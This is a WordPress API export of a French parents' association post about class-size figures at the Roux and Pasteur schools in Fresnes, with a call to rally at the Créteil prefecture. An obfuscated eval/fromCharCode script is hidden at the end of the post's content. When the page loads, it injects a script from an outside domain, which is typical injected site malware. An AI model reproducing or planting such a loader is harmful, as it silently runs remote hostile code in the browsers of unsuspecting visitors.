{"id":7542,"date":"2017-03-02T20:56:33","date_gmt":"2017-03-02T19:56:33","guid":{"rendered":"http:\/\/education.acctif.eu\/?p=7542"},"modified":"2018-01-23T16:34:25","modified_gmt":"2018-01-23T15:34:25","slug":"mobilisation-pour-2-ouvertures-de-classe-a-rouxpasteur","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7542","title":{"rendered":"Mobilisation pour 2 ouvertures de classes \u00e0 Roux et Pasteur"},"content":{"rendered":"<p>Le 1er mars, une d\u00e9l\u00e9gation s&rsquo;est rendue \u00e0 l&rsquo;inspection acad\u00e9mique pour demander une ouverture de classe.\u00a0Etaient pr\u00e9sents : les directeurs des \u00e9coles Roux et Pasteur, un enseignant de Roux, un enseignant de Pasteur, un responsable syndical, ainsi qu&rsquo;un repr\u00e9sentant ACCTIF Education (t\u00eate de liste Roux). Elle a \u00e9t\u00e9 re\u00e7ue par la directrice de cabinet de l&rsquo;inspectrice acad\u00e9mique.<\/p>\n<p>Les directeurs se sont exprim\u00e9s sur la situation de chaque \u00e9cole. Ainsi, aujourd\u2019hui, il faut compter 26,8 \u00e9l\u00e8ves par classe \u00e0 Roux et 25,6 \u00e0 Pasteur. Les projections pour la rentr\u00e9e prochaine 2017-2018 sont de<b><span style=\"color: #ff0000;\"> 27,7 sur Roux<\/span><\/b> et <span style=\"color: #ff0000;\"><b>27,2 sur Pasteur<\/b><\/span> en incluant la classe ULIS (pour les enfants en situation de handicap). Rappelons que la limite \u00a0de d\u00e9clenchement pour une ouverture de classe est de 27,5 !<\/p>\n<p>Parmi les arguments avanc\u00e9s pour expliquer cette hausse\u00a0des effectifs : la carte scolaire incluant depuis 2 ans les secteurs flottants, la construction de nouveaux logements, de nouvelles \u00e9coles satur\u00e9es dont Barbara, Monod et Coquelicots. R\u00e9sultat : les enfants\u00a0finissent par \u00eatre scolaris\u00e9s \u00e0 Roux ou Pasteur, qui disposent de places. \u00a0Le responsable syndical pr\u00e9sent a, lui,\u00a0insist\u00e9 sur la situation exceptionnelle de Fresnes.<\/p>\n<div>Ainsi, les \u00e9coles nouvellement construites, l&rsquo;\u00e9l\u00e9mentaire Monod et la maternelle\u00a0des Coquelicots, situ\u00e9es en face de la Cerisaie, ainsi que l&rsquo;\u00e9cole du centre ville Barbara ne peuvent plus accueillir d\u2019\u00e9l\u00e8ves suppl\u00e9mentaires. Les nouveaux arrivants sont donc orient\u00e9s sur notre groupe scolaire. Pasteur a ainsi d\u00e9j\u00e0\u00a0accueilli 8 \u00e9l\u00e8ves de plus depuis le d\u00e9but de l\u2019ann\u00e9e scolaire, Roux 4 \u00e9l\u00e8ves, selon les chiffres en notre possession. En f\u00e9vrier, ce sont 2 \u00e9l\u00e8ves de plus\u00a0qui sont d\u00e9sormais scolaris\u00e9s sur\u00a0Roux et 1 sur Pasteur.<\/div>\n<blockquote>\n<div><strong>Au total, selon les derniers chiffres dont nous disposons, ce sont\u00a0<span style=\"text-decoration: underline;\">95 enfants qui arriveront en\u00a0CP \u00e0 la rentr\u00e9e 2017 sur le groupe scolaire.\u00a0<\/span><\/strong><\/div>\n<\/blockquote>\n<div>\n<p>En tant que repr\u00e9sentants des parents d&rsquo;\u00e9l\u00e8ves, nous avons donc plaid\u00e9 pour que nos enfants\u00a0\u00e9tudient dans de bonnes conditions d\u2019apprentissage, pour que les enseignants aient\u00a0les moyens de transmettre leur savoir \u00e0 leurs \u00e9l\u00e8ves. Nous avons expliqu\u00e9 que Fresnes attirait de nombreux nouveaux arrivants du fait de la proximit\u00e9 d&rsquo;Antony et du RER, que la population fresnoise se renouvelle, ce qui occasionne l&rsquo;installation de nouvelles familles avec des enfants, y compris en cours d&rsquo;ann\u00e9e.<\/p>\n<p>Pour faire face \u00e0 cette\u00a0hausse des effectifs, <strong>la d\u00e9l\u00e9gation, dont ACCTIF Education, a donc demand\u00e9 deux ouvertures de classe : une \u00e0 Pasteur et une \u00e0 Roux pour la rentr\u00e9e 2017. <\/strong>Pour rappel, <a href=\"https:\/\/education.acctif.eu\/2017\/02\/20\/hausse-des-effectifs-en-2017-ouverture-dune-classe-a-blancs-bouleaux-et-roux-pasteur-alors\/\">une ouverture de classe est d\u00e9j\u00e0 act\u00e9e \u00e0 la maternelle des Blancs Bouleaux, comme expliqu\u00e9 ici<\/a>.<\/p>\n<div>\n<p>Ce lundi 6 mars aura lieu la premi\u00e8re phase de la r\u00e9partitions des moyens lors du CT (Comit\u00e9 technique) et mardi 7 mars un appel \u00e0 la mobilisation devant la pr\u00e9fecture de Cr\u00e9teil est lanc\u00e9 pour le CDEN (Conseil D\u00e9partemental de l\u2019Education Nationale).<\/p>\n<blockquote>\n<div><b>\u00a0<\/b><\/div>\n<div><b>TOUT SE JOUERA CE MARDI 7 MARS\u00a0<\/b>lors du CDEN \u00e0 Cr\u00e9teil.\u00a0<b><span style=\"color: #ff0000;\">Un appel \u00e0 la gr\u00e8ve est lanc\u00e9 pour ce mardi 7 mars<\/span><\/b>. <strong>Une forte\u00a0mobilisation de la\u00a0part des\u00a0parents d\u2019\u00e9l\u00e8ves\u00a0et des enseignants <span style=\"text-decoration: underline;\">est\u00a0attendue devant la Pr\u00e9fecture de Cr\u00e9teil, mardi 7 mars, \u00e0 14h30<\/span>.<\/strong><\/div>\n<\/blockquote>\n<p><b>Ne revivons pas <a href=\"https:\/\/education.acctif.eu\/2016\/09\/02\/rentree-surchargee-a-pasteur\/\">l\u2019op\u00e9ration\u00a0\u00ab\u00a0sardines\u00a0\u00bb<\/a> de l\u2019ann\u00e9e derni\u00e8re ! IL FAUT\u00a0QUE NOUS, PARENTS SOYONS MOBILISES AUPRES DES ENSEIGNANTS POUR NOS ENFANTS. Notre pr\u00e9sence est indispensable\u00a0!<\/b><\/p>\n<p><b>Venez nombreux<\/b>\u00a0<strong>pour que la d\u00e9l\u00e9gation fresnoise soit la plus forte, la plus bruyante.\u00a0<\/strong>Parce que malheureusement, ce sont ceux qui feront le plus de bruit et qui se feront le plus \u00ab\u00a0remarqu\u00e9s\u00a0\u00bb qui auront le plus\u00a0de chance d\u2019obtenir une r\u00e9ponse positive.<\/p>\n<\/div>\n<\/div>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le 1er mars, une d\u00e9l\u00e9gation s&rsquo;est rendue \u00e0 l&rsquo;inspection acad\u00e9mique pour demander une ouverture de classe.\u00a0Etaient pr\u00e9sents : les directeurs des \u00e9coles Roux et Pasteur, un enseignant de Roux, un enseignant de Pasteur, un responsable syndical, ainsi qu&rsquo;un repr\u00e9sentant ACCTIF Education (t\u00eate de liste Roux). Elle a \u00e9t\u00e9 re\u00e7ue par la directrice de cabinet de &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7542\"> <span class=\"screen-reader-text\">Mobilisation pour 2 ouvertures de classes \u00e0 Roux et Pasteur<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7638,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[36,37],"tags":[],"class_list":["post-7542","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pasteur","category-roux"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7542","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7542"}],"version-history":[{"count":1,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7542\/revisions"}],"predecessor-version":[{"id":7639,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7542\/revisions\/7639"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/7638"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7542"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}